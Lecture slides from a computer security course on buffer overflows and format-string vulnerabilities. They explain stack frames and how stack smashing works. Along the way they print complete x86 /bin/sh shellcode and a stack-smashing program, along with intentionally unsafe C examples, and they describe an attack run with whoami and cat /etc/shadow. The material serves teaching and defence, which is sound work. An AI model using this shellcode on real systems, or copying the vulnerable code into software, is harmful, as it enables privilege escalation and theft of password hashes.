Buffer Overflows and Defenses


Buffer Overflows and Defenses CS 419: Computer Security

Buffer Overflow
- a very common attack mechanism, from the 1988 Morris Worm to Code Red, Slammer, Sasser and many others
- prevention techniques are known
- still of major concern due to a legacy of widely deployed buggy code and continued careless programming techniques

In this chapter we turn our attention specifically to buffer overflow attacks. This type of attack is one of the most common seen, and results from careless programming in applications. It has been known since it was first widely used by the Morris Internet Worm in 1988, and techniques for preventing it are well known and documented. Unfortunately, due to both a legacy of buggy code in widely deployed operating systems and applications and continuing careless programming practices, it is still a major source of concern to security practitioners.

Buffer Overflow Basics
- caused by programming error
- allows more data to be stored than the capacity available in a fixed-size buffer
- buffer can be on the stack, on the heap, or in global data
- overwrites adjacent memory locations: corruption of program data, unexpected transfer of control, memory access violation, execution of code chosen by the attacker

A buffer overflow can occur as a result of a programming error when a process attempts to store data beyond the limits of a fixed-size buffer, and consequently overwrites adjacent memory locations. These locations could hold other program variables or parameters, or program control flow data such as return addresses and pointers to previous stack frames. The buffer could be located on the stack, in the heap, or in the data section of the process. The consequences of this error include corruption of data used by the program, unexpected transfer of control in the program, possibly memory access violations, and very likely eventual program termination. When done deliberately as part of an attack on a system, the transfer of control could be to code of the attacker's choosing, resulting in the ability to execute arbitrary code with the privileges of the attacked process.

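Buffer overflow example

int foo(void){
    char buf[10];
    …
    strcpy(buf, "hello world");   /* 12 bytes with the terminating NUL, copied into a 10-byte buffer */
}

int get_user_input(void){
    char buf[LEN];
    …
    gets(buf);   /* gets() has no length limit, so a line of LEN or more characters overflows buf */
}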
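
For contrast, the two calls above can be written with explicit bounds. This is a minimal sketch assuming a C99 library; the helper names copy_bounded and read_line_bounded are hypothetical and do not come from the slides.

```c
#include <assert.h>
#include <limits.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Copies src into dst, whose capacity is cap bytes including the NUL.
   Returns false and writes nothing when src does not fit. */
bool copy_bounded(char *dst, size_t cap, const char *src)
{
    assert(dst != NULL && src != NULL);
    size_t need = strlen(src) + 1;   /* characters plus terminating NUL */
    if (need > cap)
        return false;
    memcpy(dst, src, need);
    return true;
}

/* Reads at most cap - 1 characters of one line, unlike gets().
   Returns false on end of file, read error, or an unusable capacity. */
bool read_line_bounded(char *dst, size_t cap, FILE *in)
{
    assert(dst != NULL && in != NULL);
    if (cap == 0 || cap > (size_t)INT_MAX)
        return false;
    if (fgets(dst, (int)cap, in) == NULL)
        return false;
    dst[strcspn(dst, "\n")] = '\0';   /* drop the newline if one was read */
    return true;
}
```

With a 10-byte buffer, copy_bounded rejects "hello world" instead of writing 12 bytes, and read_line_bounded leaves any excess input unread rather than overflowing.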

Buffer Overflow Example

To illustrate the basic operation of a buffer overflow, consider the C main function given in Figure 11.1a. This contains three variables (valid, str1 and str2), whose values will typically be saved in adjacent memory locations. The purpose of the code fragment is to call the function next_tag(str1) to copy into str1 some expected tag value, e.g. "START". It then reads the next line from the standard input for the program using the C library gets() function, and then compares the string read with the expected tag. If the next line did indeed contain just the string "START", this comparison would succeed, and the variable valid would be set to TRUE. This case is shown in the first of the three example program runs in Figure 11.1b. Any other input tag would leave it with the value FALSE.

The problem with this code exists because the traditional C library gets() function does not include any checking on the amount of data copied. If more than 7 characters are present on the input line, when read in they will (along with the terminating NUL character) require more room than is available in the str2 buffer. Consequently the extra characters will overwrite the values of the adjacent variable, str1 in this case. For example, if the input line contained "EVILINPUTVALUE", the result will be that str1 is overwritten with the characters "TVALUE", and str2 will use not only the 8 characters allocated to it, but 7 more from str1 as well. This can be seen in the second example run in Figure 11.1b.

Knowing the structure of the code processing it, an attacker could arrange for the overwritten value in str1 to equal the value placed in str2, so that the subsequent comparison succeeds. For example, the input line could be the string "BADINPUTBADINPUT". This results in the comparison succeeding, as shown in the third of the three example program runs.
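
The three runs described above can be reproduced without relying on undefined behaviour by modelling the two buffers as one flat byte region. This is only a sketch: Figure 11.1a is not reproduced in this transcript, so the layout (str2 directly below str1), the 8-byte comparison, and the names frame_model and check_tag are assumptions made for illustration.

```c
#include <assert.h>
#include <stdbool.h>
#include <string.h>

enum { SLOT = 8 };   /* assumed size of each buffer */

/* Bytes 0..7 stand in for str2, bytes 8..15 for str1. The extra
   slot absorbs the terminating NUL of a 16-character input. */
struct frame_model {
    char mem[3 * SLOT];
};

/* Simulates next_tag(str1) followed by an unchecked gets(str2),
   then the tag comparison. Returns the resulting value of valid. */
bool check_tag(struct frame_model *f, const char *input)
{
    assert(f != NULL && input != NULL);
    char *str2 = f->mem;
    char *str1 = f->mem + SLOT;
    size_t n = strlen(input) + 1;

    memset(f->mem, 0, sizeof f->mem);
    memcpy(str1, "START", 6);          /* expected tag, with its NUL */
    if (n > sizeof f->mem)
        n = sizeof f->mem;             /* keep the model itself in bounds */
    memcpy(str2, input, n);            /* no check against SLOT: the bug */
    return strncmp(str1, str2, SLOT) == 0;
}
```

In this model "START" is accepted, "EVILINPUTVALUE" is rejected but leaves "TVALUE" in the str1 region, and "BADINPUTBADINPUT" is accepted because both regions end up holding "BADINPUT".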

Buffer Overflow Attacks
- to exploit a buffer overflow an attacker must identify a buffer overflow vulnerability in some program (inspection, tracing execution, fuzzing tools)
- and understand how the buffer is stored in memory, to determine the potential for corruption

To exploit any type of buffer overflow, such as those we have illustrated here, the attacker needs to: 1. identify a buffer overflow vulnerability in some program that can be triggered using externally sourced data under the attacker's control, and 2. understand how that buffer will be stored in the process's memory, and hence the potential for corrupting adjacent memory locations and altering the flow of execution of the program. Identifying vulnerable programs may be done by inspection of program source, by tracing the execution of programs as they process oversized input, or by using techniques such as fuzzing. What the attacker does with the resulting corruption of memory varies considerably, depending on what values are being overwritten.

Why are they dangerous?
- Can trash memory, crashing the program.
- Can be used to hijack the program: spawn a shell or execute code with the privileges of the program.
- "setuid root" programs are particularly dangerous if exploited.

A Little Programming Language History
- at machine level all data is an array of bytes; interpretation depends on the instructions used
- modern high-level languages have a strong notion of type and valid operations: not vulnerable to buffer overflows, but this incurs overhead and some limits on use
- C and related languages have high-level control structures, but allow direct access to memory: hence are vulnerable to buffer overflow, and have a large legacy of widely used, unsafe, and hence vulnerable code

Before exploring buffer overflows further, it is worth considering how the potential for their occurrence developed, and why programs are not necessarily protected from such errors. To understand this, we need to briefly consider the history of programming languages and the fundamental operation of computer systems. At the basic machine level, all of the data manipulated by machine instructions executed by the computer processor are stored in either the processor's registers or in memory. The data are simply arrays of bytes. Their interpretation is entirely determined by the function of the instructions accessing them.

At the other end of the abstraction spectrum, modern high-level programming languages like Java, Ada, Python, and many others have a very strong notion of the type of variables and of what constitutes permissible operations on them. Such languages do not suffer from buffer overflows. But this flexibility and safety comes at a cost in resource use, both at compile time and in additional code that must be executed at run time to impose checks such as that on buffer limits. The distance from the underlying machine language and architecture also means that access to some instructions and hardware resources is lost.

In between these extremes are languages such as C and its derivatives, which have many modern high-level control structures and data type abstractions, but which still provide the ability to access and manipulate memory data directly. Unfortunately, this means the language is susceptible to inappropriate use of memory contents, as has occurred in a number of common standard library functions. There is a large legacy body of code using unsafe functions, which is thus potentially vulnerable to buffer overflows.

Programs and Processes

At this point, it is useful to step back and take a somewhat wider view of a running program, and the placement of key regions such as the program code, global data, heap and stack. When a program is run, the operating system typically creates a new process for it. The process is given its own virtual address space, with a general structure as shown in Figure 11.4. This consists of the contents of the executable program file (including global data, relocation table, and actual program code segments) near the bottom of this address space, space for the program heap to then grow upwards from above the code, and room for the stack to grow down from near the middle (if room is reserved for kernel space in the upper half) or the top. The stack frames we discussed are hence placed one below another in the stack area, as the stack grows downwards through memory.

Function Calls and Stack Frames

To better understand how buffer overflows work, we first take a brief digression into the mechanisms used by program functions to manage their local state on each call. When one function calls another, at the very least it needs somewhere to save the return address so the called function can return control when it finishes. Aside from that, it also needs locations to save the parameters to be passed in to the called function, and possibly to save register values that it wishes to continue using when the called function returns. All of this data is usually saved on the stack in a structure known as a stack frame. One further piece of information then needed is some means of chaining these frames together. Figure 11.3 illustrates such a stack frame structure. See the text for details of the steps performed when one function calls another. As has been indicated before, the precise implementation of these steps is language, compiler and processor architecture dependent. However, something similar will usually be found in most cases.

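The stack

void function(int a, int b, int c){
    char buf1[5];
    …
}

void main() {
    function(1, 2, 3);
}

Stack labels on the slide, from high to low addresses: c, b, a, buf1, buf2, with the pointers ebp and esp marked alongside.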

The stack

void main() {
    function(1, 2, 3);
}

    pushl $3
    pushl $2
    pushl $1
    call function

The slide builds up the stack one push at a time: the arguments are pushed in reverse order, with ebp and esp marked at each step.

A function call

void main() {
    function(1, 2, 3);
}

In main:
    pushl $3
    pushl $2
    pushl $1
    call function

On entry to function:
    pushl %ebp
    movl %esp, %ebp
    subl $20, %esp

Stack labels on the slide, from high to low addresses: c, b, a, return addr, saved ebp, with ebp and esp marked after the prologue.

Digression: x86 tutorial
pushl %ebp: Pushes ebp onto the stack.
movl %esp,%ebp: Copies the current value of esp into the register ebp.
subl $0x4,%esp: Subtracts 4 from the value of esp.
call 0x8000470 <function>: Calls the function at address 0x8000470 and pushes the return address onto the stack.
movl $0x1,0xfffffffc(%ebp): Moves 0x1 into the memory at ebp - 4.
leal 0xfffffffc(%ebp),%eax: Loads the address ebp - 4 into eax.
ret: Returns by jumping to the return address saved on the stack.
nop: Does nothing.
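
The displacement 0xfffffffc in the instructions above reads as ebp - 4 because the disassembler prints a signed 32-bit offset as unsigned hex. A small sketch of that two's-complement conversion follows; the function name disp_from_text is hypothetical.

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>

/* Interprets a 32-bit displacement, printed as unsigned hex by the
   disassembler, as the signed two's-complement offset it encodes. */
int32_t disp_from_text(const char *hex)
{
    assert(hex != NULL);
    uint32_t raw = (uint32_t)strtoul(hex, NULL, 16);
    if (raw >= UINT32_C(0x80000000)) {
        /* Negative value: compute it without an out-of-range cast. */
        uint32_t magnitude_minus_one = UINT32_MAX - raw;
        return -(int32_t)magnitude_minus_one - 1;
    }
    return (int32_t)raw;
}
```

Under this reading 0xfffffffc is -4 and 0xfffffff8 is -8, which matches the offsets of the local variables in the listings that follow.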

Stack Buffer Overflow
- occurs when the buffer is located on the stack
- used by the Morris Worm; the "Smashing the Stack" paper popularized it
- local variables sit below the saved frame pointer and return address, hence overflow of a local buffer can potentially overwrite these key control items
- attacker overwrites the return address with the address of the desired code: in the program, in a system library, or loaded in the buffer

A stack buffer overflow occurs when the targeted buffer is located on the stack, usually as a local variable in a function's stack frame. This form of attack is also referred to as stack smashing. Stack buffer overflow attacks have been exploited since first being seen in the wild in the Morris Internet Worm in 1988. The publication by Aleph One (Elias Levy) of details of the attack and how to exploit it [LEVY96] hastened further use of this technique, which is still widely exploited.

Because the local variables are placed below the saved frame pointer and return address, the possibility exists of exploiting a local buffer variable overflow vulnerability to overwrite the values of one or both of these key function linkage values. This possibility of overwriting the saved frame pointer and return address forms the core of a stack overflow attack. The attacker can overwrite the return address with any desired value, not just the address of the targeted function. It could be the address of any function, or indeed of any sequence of machine instructions present in the program or its associated system libraries. However, the approach used in the original attacks was to include the desired machine code in the buffer being overflowed.

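A benign buffer overflow

void function(char *str){
    char buffer[16];
    strcpy(buffer, str);   /* copies 255 characters plus NUL into a 16-byte buffer */
}

void main() {
    char largestr[256];
    int i;
    for (i = 0; i < 255; i++) {
        largestr[i] = 'A';
    }
    largestr[255] = '\0';   /* terminate the string so strcpy stops here */
    function(largestr);
}

Stack frame of function, from high to low addresses: str, return addr, saved ebp, buffer.

This program causes a segfault. Why?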
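
One way to approach the question: strcpy keeps writing 'A' bytes past the 16-byte buffer, over the saved ebp and the return address. The sketch below computes the 32-bit word that results when every byte of a slot is the same fill character; word_from_fill is a hypothetical helper, and ASCII is assumed.

```c
#include <assert.h>
#include <limits.h>
#include <stdint.h>
#include <string.h>

/* Returns the 32-bit word whose four bytes all equal the fill byte c.
   The result is the same on little- and big-endian machines. */
uint32_t word_from_fill(int c)
{
    assert(c >= 0 && c <= UCHAR_MAX);
    uint32_t word;
    memset(&word, c, sizeof word);
    return word;
}
```

For 'A' (0x41) the word is 0x41414141, so on a 32-bit layout like the one pictured the function would try to return to address 0x41414141, which is typically not mapped in the process, hence the segmentation fault.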

Stack Overflow Example

To illustrate the operation of a classic stack overflow, consider the C function given in Figure 11.5a. It contains a single local variable, the buffer inp. This hello function (a version of the classic Hello World program) prompts for a name, which it then reads into the buffer inp using the unsafe gets() library routine. It then displays the value read using the printf() library routine. As long as a small value is read in there will be no problems and the program calling this function will run successfully, as shown in the first of the example program runs in Figure 11.5b. However, if too much data is input, as shown in the second of the example program runs in Figure 11.5b, then the data extends beyond the end of the buffer and ends up overwriting the saved frame pointer and return address with garbage values (corresponding to the binary representation of the characters supplied). Then, when the function attempts to transfer control to the return address, it typically jumps to an illegal memory location, resulting in a "Segmentation Fault" and the abnormal termination of the program, as shown.

Of more interest to the attacker, rather than immediately crashing the program, is to have it transfer control to a location and code of the attacker's choosing. We can illustrate this process using this function, making it start re-executing the hello function rather than returning to the calling main routine. To do this we need to find the address at which the hello function will be loaded. The easiest way to determine this is to run a debugger on the target program and disassemble the target function. When done, it is found at address 0x08048394. For the purpose of this demonstration I used a simple one-line Perl program, whose pack() function can easily be used to convert a hexadecimal string into its binary equivalent, as can be seen in the third of the example program runs in Figure 11.5b.
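
The hexadecimal-to-binary step mentioned above amounts to writing the address as four bytes in the byte order the processor expects. A minimal sketch in C, assuming a little-endian 32-bit x86 target; put_le32 is a hypothetical helper and is not the Perl one-liner from the figure.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Stores value into out as four bytes, least significant byte first,
   which is how a 32-bit x86 processor lays out an address in memory. */
void put_le32(unsigned char out[4], uint32_t value)
{
    assert(out != NULL);
    for (size_t i = 0; i < 4; i++)
        out[i] = (unsigned char)((value >> (8 * i)) & 0xffu);
}
```

For the address 0x08048394 the bytes come out in the order 0x94, 0x83, 0x04, 0x08.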

Another Stack Overflow

In all the examples used so far, the buffer overflow has occurred when the input was read. The possibility also exists that a program can safely read and save input, pass it around the program, and then at some later time in another function unsafely copy it, resulting in a buffer overflow. Figure 11.7a shows an example program illustrating this behavior. The main() function includes the buffer buf. This is passed along with its size to the function getinp(), which safely reads a value using fgets(). The getinp() function then returns to main(), which then calls the function display() with the value in buf. This function constructs a response string in a second local buffer called tmp and then displays this. Unfortunately, the sprintf() library routine is another common, unsafe C library routine. Note in this program that the buffers are both the same size. The problem that may result occurs when data is being merged into a buffer that includes the contents of another buffer, such that the space needed exceeds the space available.

Another Stack Overflow

Look at the example runs of this program shown in Figure 11.7b. For the first run, the value read is small enough that the merged response did not corrupt the stack frame. For the second run, the supplied input was much too large. However, because a safe input function was used, only 15 characters were read, as shown in the following line. When this was then merged with the response string, the result was larger than the space available in the destination buffer. In fact, it overwrote the saved frame pointer, but not the return address. So the function returned, as shown by the message printed by the main() function. But when main() tried to return, because its frame pointer had been corrupted and now held an arbitrary value, the program jumped to an illegal address and crashed. In this case the combined result was not long enough to reach the return address, but this would be possible if a larger buffer size had been used.
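
The merge step described above can be bounded by using snprintf() and checking its return value. This is a sketch only: Figure 11.7a is not reproduced in this transcript, so the response text "read val: " and the helper name format_response are assumptions.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdio.h>

/* Builds the response in dst (capacity cap bytes). Returns true when the
   whole response fit, false when snprintf had to truncate it. Either way
   nothing is written beyond dst[cap - 1]. */
bool format_response(char *dst, size_t cap, const char *val)
{
    assert(dst != NULL && val != NULL && cap > 0);
    int n = snprintf(dst, cap, "read val: %s\n", val);
    return n >= 0 && (size_t)n < cap;
}
```

With two 16-byte buffers, a 4-character value fits exactly, while a 15-character value is reported as truncated instead of overwriting the saved frame pointer.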

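Subverting control flow

void function(int a, int b, int c){
    char buf1[5];
    char buf2[10];
    int *ret;
    ret = (int *)(buf1 + 12);   /* points at the saved return address in this layout */
    *ret += 8;                  /* moves the return address forward in main */
}

void main() {
    int x;
    x = 0;
    function(1, 2, 3);
    x = 1;
    printf("%d\n", x);
}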

Code of "main"

0x8000490 <main>: pushl %ebp
0x8000491 <main+1>: movl %esp,%ebp
0x8000493 <main+3>: subl $0x4,%esp
0x8000496 <main+6>: movl $0x0,0xfffffffc(%ebp)
0x800049d <main+13>: pushl $0x3
0x800049f <main+15>: pushl $0x2
0x80004a1 <main+17>: pushl $0x1
0x80004a3 <main+19>: call 0x8000470 <function>
0x80004a8 <main+24>: addl $0xc,%esp
0x80004ab <main+27>: movl $0x1,0xfffffffc(%ebp)
0x80004b2 <main+34>: movl 0xfffffffc(%ebp),%eax
0x80004b5 <main+37>: pushl %eax
0x80004b6 <main+38>: pushl $0x80004f8
0x80004bb <main+43>: call 0x8000378 <printf>
0x80004c0 <main+48>: addl $0x8,%esp
0x80004c3 <main+51>: movl %ebp,%esp
0x80004c5 <main+53>: popl %ebp
0x80004c6 <main+54>: ret
0x80004c7 <main+55>: nop
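
The listing supplies the numbers needed to choose the increment applied to the saved return address. The call at main+19 pushes 0x80004a8 as the return address, the assignment x = 1 is the movl at 0x80004ab, and the next instruction starts at 0x80004b2. A minimal sketch of the arithmetic; skip_distance is a hypothetical helper.

```c
#include <assert.h>
#include <stdint.h>

/* Number of bytes to add to the saved return address so that execution
   resumes at resume_addr instead of return_addr. */
uint32_t skip_distance(uint32_t return_addr, uint32_t resume_addr)
{
    assert(resume_addr >= return_addr);
    return resume_addr - return_addr;
}
```

By these addresses the distance is 0x80004b2 - 0x80004a8 = 10 bytes, so an increment of 8 would land inside the 7-byte movl rather than after it. The exact offset depends on the compiler and its options, so it is best read off a disassembly of the actual binary.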

Stack labels on the slide, from high to low addresses: str, 0xffff1234 (in the return address slot), saved ebp, buffer.

Writing an exploit program

#include <stdio.h>
#include <unistd.h>   /* declares execve() */

void main() {
    char *name[2];
    name[0] = "/bin/sh";
    name[1] = NULL;
    execve(name[0], name, NULL);
}

0x8000130 <main>: pushl %ebp
0x8000131 <main+1>: movl %esp,%ebp
0x8000133 <main+3>: subl $0x8,%esp
0x8000136 <main+6>: movl $0x80027b8,0xfffffff8(%ebp)
0x800013d <main+13>: movl $0x0,0xfffffffc(%ebp)
0x8000144 <main+20>: pushl $0x0
0x8000146 <main+22>: leal 0xfffffff8(%ebp),%eax
0x8000149 <main+25>: pushl %eax
0x800014a <main+26>: movl 0xfffffff8(%ebp),%eax
0x800014d <main+29>: pushl %eax
0x800014e <main+30>: call 0x80002bc <__execve>
0x8000153 <main+35>: addl $0xc,%esp
0x8000156 <main+38>: movl %ebp,%esp
0x8000158 <main+40>: popl %ebp
0x8000159 <main+41>: ret

0x80002bc <__execve>: pushl %ebp
0x80002bd <__execve+1>: movl %esp,%ebp
0x80002bf <__execve+3>: pushl %ebx
0x80002c0 <__execve+4>: movl $0xb,%eax
0x80002c5 <__execve+9>: movl 0x8(%ebp),%ebx
0x80002c8 <__execve+12>: movl 0xc(%ebp),%ecx
0x80002cb <__execve+15>: movl 0x10(%ebp),%edx
0x80002ce <__execve+18>: int $0x80
0x80002d0 <__execve+20>: movl %eax,%edx
0x80002d2 <__execve+22>: testl %edx,%edx
0x80002d4 <__execve+24>: jnl 0x80002e6 <__execve+42>
0x80002d6 <__execve+26>: negl %edx
0x80002d8 <__execve+28>: pushl %edx
0x80002d9 <__execve+29>: call 0x8001a34 <__normal_errno_location>
0x80002de <__execve+34>: popl %edx
0x80002df <__execve+35>: movl %edx,(%eax)
0x80002e1 <__execve+37>: movl $0xffffffff,%eax
0x80002e6 <__execve+42>: popl %ebx
0x80002e7 <__execve+43>: movl %ebp,%esp
0x80002e9 <__execve+45>: popl %ebp
0x80002ea <__execve+46>: ret
0x80002eb <__execve+47>: nop

Basic requirements.
- Have the null-terminated string "/bin/sh" in memory.
- Have the address of this string in memory, followed by a null long word.
- Copy 0xb into eax.
- Copy the address of the string into ebx.
- Copy the address of the address of the string into ecx.
- Copy the address of the null long word into edx.
- Execute int $0x80 (system call).

Attack payload.

movl string_addr,string_addr_addr
movb $0x0,null_byte_addr
movl $0x0,null_addr
movl $0xb,%eax
movl string_addr,%ebx
leal string_addr,%ecx
leal null_string,%edx
int $0x80
movl $0x1, %eax
movl $0x0, %ebx
int $0x80
/bin/sh string goes here.

Where in the memory space of the process will this be placed? Use relative addressing!

Attack payload.

jmp offset-to-call              # 2 bytes
popl %esi                       # 1 byte
movl %esi,array-offset(%esi)    # 3 bytes
movb $0x0,nullbyteoffset(%esi)  # 4 bytes
movl $0x0,null-offset(%esi)     # 7 bytes
movl $0xb,%eax                  # 5 bytes
movl %esi,%ebx                  # 2 bytes
leal array-offset(%esi),%ecx    # 3 bytes
leal null-offset(%esi),%edx     # 3 bytes
int $0x80                       # 2 bytes
movl $0x1, %eax                 # 5 bytes
movl $0x0, %ebx                 # 5 bytes
int $0x80                       # 2 bytes
call offset-to-popl             # 5 bytes
/bin/sh string goes here.

Hex representation of code.

char shellcode[] = "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";

void main() {
    int *ret;
    ret = (int *)&ret + 2;
    (*ret) = (int)shellcode;
}

Use gdb to create this!

Zeroes in attack payload

Problem instructions:        Substitute with:
movb $0x0,0x7(%esi)          xorl %eax,%eax
movl $0x0,0xc(%esi)          movb %al,0x7(%esi)
                             movl %eax,0xc(%esi)

movl $0xb,%eax               movb $0xb,%al

movl $0x1, %eax              xorl %ebx,%ebx
movl $0x0, %ebx              movl %ebx,%eax
                             inc %eax
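
Zero bytes matter because the payload travels through string routines such as strcpy(), which stop copying at the first NUL. The sketch below counts zero bytes in an instruction encoding; count_nul_bytes is a hypothetical helper, and the byte values are the encodings of movl $0xb,%eax and movb $0xb,%al as they appear in the two hex strings in these slides.

```c
#include <assert.h>
#include <stddef.h>

/* Counts the zero bytes in a block of machine code. Any nonzero result
   means a C string copy would stop before the end of the block. */
size_t count_nul_bytes(const unsigned char *code, size_t len)
{
    assert(code != NULL);
    size_t count = 0;
    for (size_t i = 0; i < len; i++) {
        if (code[i] == 0)
            count++;
    }
    return count;
}
```

The 5-byte form b8 0b 00 00 00 contains three zero bytes, while the 2-byte form b0 0b contains none, which is why the substitution also shortens the code.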

A stack smashing attack

#include <string.h>   /* strlen(), strcpy() */

char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

char large_string[128];

void main() {
    char buffer[96];
    int i;
    long *long_ptr = (long *) large_string;

    /* fill large_string with the address of buffer */
    for (i = 0; i < 32; i++)
        *(long_ptr + i) = (int) buffer;

    /* place the shellcode at the start of large_string */
    for (i = 0; i < strlen(shellcode); i++)
        large_string[i] = shellcode[i];

    /* 128 bytes copied into a 96-byte buffer */
    strcpy(buffer, large_string);
}

Example Shellcode

Given the above limitations, what results from this design process is code similar to that shown in Figure 11.8b. This code is written in x86 assembly language, as used by Pentium processors. In general this code implements the functionality specified in the original C program in Figure 11.8a. However, there are a few unique features.

The first is how the string "/bin/sh" is referenced. In shellcode it must be included along with the instructions, typically located just after them. In order to then refer to this string, the code must determine the address where it is located, relative to the current instruction address. This can be done using a novel, non-standard use of the CALL instruction.

The next issue is ensuring that no NULLs occur in the shellcode. This means a zero value cannot be used in any instruction argument, or in any constant data. Instead, any required zero values must be generated and saved as the code runs. The logical XOR of a register value with itself generates a zero value. This value can then be copied anywhere needed, such as the end of the string, and also as the value of args[1].

To deal with the inability to precisely determine the starting address of this code, the attacker can exploit the fact that the code is often much smaller than the space available in the buffer (just 40 bytes long in this example). By placing the code near the end of the buffer, the attacker can pad the space before it with NOP instructions. Because these instructions do nothing, the attacker can specify the return address used to enter this code as a location somewhere in this run of NOPs, which is called a NOP sled. When this code is assembled, the resulting machine code is shown in hexadecimal in Figure 11.8c.

Example Stack Overflow Attack

We now have all of the components needed to understand a stack overflow attack. To illustrate how such an attack is actually executed, we use a target program that is a variant on that shown in Figure 11.5a. Having identified a suitable, vulnerable, trusted utility program, the attacker has to analyze it to determine the likely location of the targeted buffer on the stack, and how much data is needed to reach up to and overflow the old frame pointer and return address in its stack frame. When this was done with our demonstration program, the buffer inp was found to start at address 0xbffffbb0, the current frame pointer (in %ebp) was 0xbffffc08, and the saved frame pointer at that address was 0xbffffc38. This means that 0x58 or 88 bytes are needed to fill the buffer and reach the saved frame pointer.

Allowing first a few more spaces at the end to provide room for the args array, the NOP sled at the start is extended until a total of exactly 88 bytes are used. The new frame pointer value can be left as 0xbffffc38, and the target return address value can be set to 0xbffffbc0, which places it around the middle of the NOP sled. Next, there must be a newline character to end this (overlong) input line which gets() will read. This gives a total of 97 bytes. Once again a small Perl program is used to convert the hexadecimal representation of this attack string into binary to implement the attack.

The attacker must also specify the commands to be run by the shell once the attack succeeds. These also must be written to the target program, as the spawned Bourne shell will be reading from the same standard input as the program it replaces. In this example, we will run two UNIX commands: whoami and cat /etc/shadow. Figure 11.9 shows this attack being executed.
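
The byte counts quoted above follow from simple address arithmetic, sketched here with the addresses given in the text. The helper names fill_length and input_length are hypothetical, and 4-byte words are assumed, as on 32-bit x86.

```c
#include <assert.h>
#include <stdint.h>

enum { WORD = 4 };   /* size of a saved frame pointer or return address */

/* Bytes from the start of the buffer up to the saved frame pointer. */
uint32_t fill_length(uint32_t buf_addr, uint32_t frame_ptr)
{
    assert(frame_ptr >= buf_addr);
    return frame_ptr - buf_addr;
}

/* Total input length: fill, saved frame pointer, return address, newline. */
uint32_t input_length(uint32_t fill)
{
    return fill + WORD + WORD + 1;
}
```

With the buffer at 0xbffffbb0 and the frame pointer at 0xbffffc08, fill_length gives 0x58 = 88, and input_length(88) gives 88 + 4 + 4 + 1 = 97. The chosen return address 0xbffffbc0 lies 16 bytes into the buffer.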

Motivation: format-string vulnerability

//Format & enter into LOG
void log(char *fmt,...){
    fprintf(LOG,fmt,...);
    return;
}

//Call log on user input
int foo(void){
    char buf[LEN];
    …
    fgets(buf,LEN-1,FILE);
    log(buf);
}

With buf = "%s%s%s" the call becomes fprintf(LOG,"%s%s%s"), which has insufficient arguments to fprintf. Possible outcomes:
- Unintelligible log entry.
- Program crash.
- Hacker takes over program!

ICSE 2005 Automatic Discovery of API-Level Exploits
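
The usual remedy is to pass user input only as an argument to a fixed format, never as the format itself. A minimal sketch, using snprintf() into a caller-supplied buffer so that the result can be inspected; format_log_entry is a hypothetical helper and not part of the slides.

```c
#include <assert.h>
#include <stdio.h>

/* Formats one log entry. The format string is the constant "%s", so any
   conversion specifiers inside user_text are copied as plain characters.
   Returns the length the full entry needs, as snprintf does. */
int format_log_entry(char *dst, size_t cap, const char *user_text)
{
    assert(dst != NULL && user_text != NULL && cap > 0);
    return snprintf(dst, cap, "%s", user_text);
}
```

Given the input "%s%s%s", the entry contains those six characters literally, and no extra arguments are read from the stack.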

Format-string vulnerabilities
- Allow intruder to assume privileges of the victim program.
- Highly prevalent. [CERT]

Overview of printf
Running example: the log/foo code from the Motivation slide. The stack diagram is built up step by step, with high addresses at the top and the stack growing toward low addresses:
1. The frame of foo holds buf, which is LEN bytes long.
2. foo pushes a pointer to buf as the argument to log.
3. The stack frame of log is created.
4. log pushes a pointer to buf as the format argument to fprintf.
5. The stack frame of fprintf is created.
6. Inside fprintf, fmtptr walks the format string in buf and argptr walks the argument area. DIS labels the gap between argptr and buf.
7. With buf = “%x%x%s”: the first %x makes fprintf read 4 bytes at argptr as an integer and advance argptr.
8. The second %x reads the next 4 bytes as an integer and advances argptr again.
9. The %s reads the next 4 bytes as an address and prints the string found there.
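
The fmtptr/argptr walk can be sketched with a toy formatter built on va_list. This is an illustrative stand-in, not the real printf: mini_format is a hypothetical name, it supports only %x, %s and %%, and it writes into a caller-supplied buffer. Each directive consumes the next argument whether or not the caller actually passed one, which is why a format string with too many directives reads whatever happens to lie on the stack.

```c
#include <assert.h>
#include <stdarg.h>
#include <stdio.h>

/* Toy formatter supporting only %x, %s and %%. Returns characters stored. */
static int mini_format(char *out, size_t out_size, const char *fmt, ...) {
    assert(out != NULL && out_size > 0 && fmt != NULL);
    va_list argptr; /* plays the role of argptr on the slides */
    size_t used = 0;
    va_start(argptr, fmt);
    for (const char *fmtptr = fmt; *fmtptr != '\0' && used + 1 < out_size; fmtptr++) {
        if (*fmtptr != '%') { /* ordinary character: copy it */
            out[used++] = *fmtptr;
            continue;
        }
        fmtptr++; /* look at the directive letter */
        if (*fmtptr == '\0') break; /* lone '%' at the end: stop */
        int n = 0;
        if (*fmtptr == 'x') { /* consume one unsigned int */
            n = snprintf(out + used, out_size - used, "%x",
                         va_arg(argptr, unsigned int));
        } else if (*fmtptr == 's') { /* consume one address and follow it */
            n = snprintf(out + used, out_size - used, "%s",
                         va_arg(argptr, const char *));
        } else if (*fmtptr == '%') { /* literal percent, consumes nothing */
            n = snprintf(out + used, out_size - used, "%%");
        }
        if (n < 0) break;
        /* snprintf may have truncated; never advance past the buffer. */
        used += (size_t)n < out_size - used ? (size_t)n : out_size - used - 1;
    }
    va_end(argptr);
    out[used] = '\0';
    return (int)used;
}
```

For example, mini_format(b, sizeof b, "%x-%s%%", 255u, "hi") stores ff-hi% in b. The call is well defined only because two arguments are supplied for the two consuming directives.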

Format-string Exploits
- What if we move argptr into buf?
- Remember, attacker can control buf!
- Diagram labels: fmtptr, argptr, buf (LEN bytes), DIS.

Format-string Exploits
- Example exploit scenario:
  - fmtptr is at a “%s”.
  - buf contains an attacker-chosen address.
  - argptr points to this location within buf.
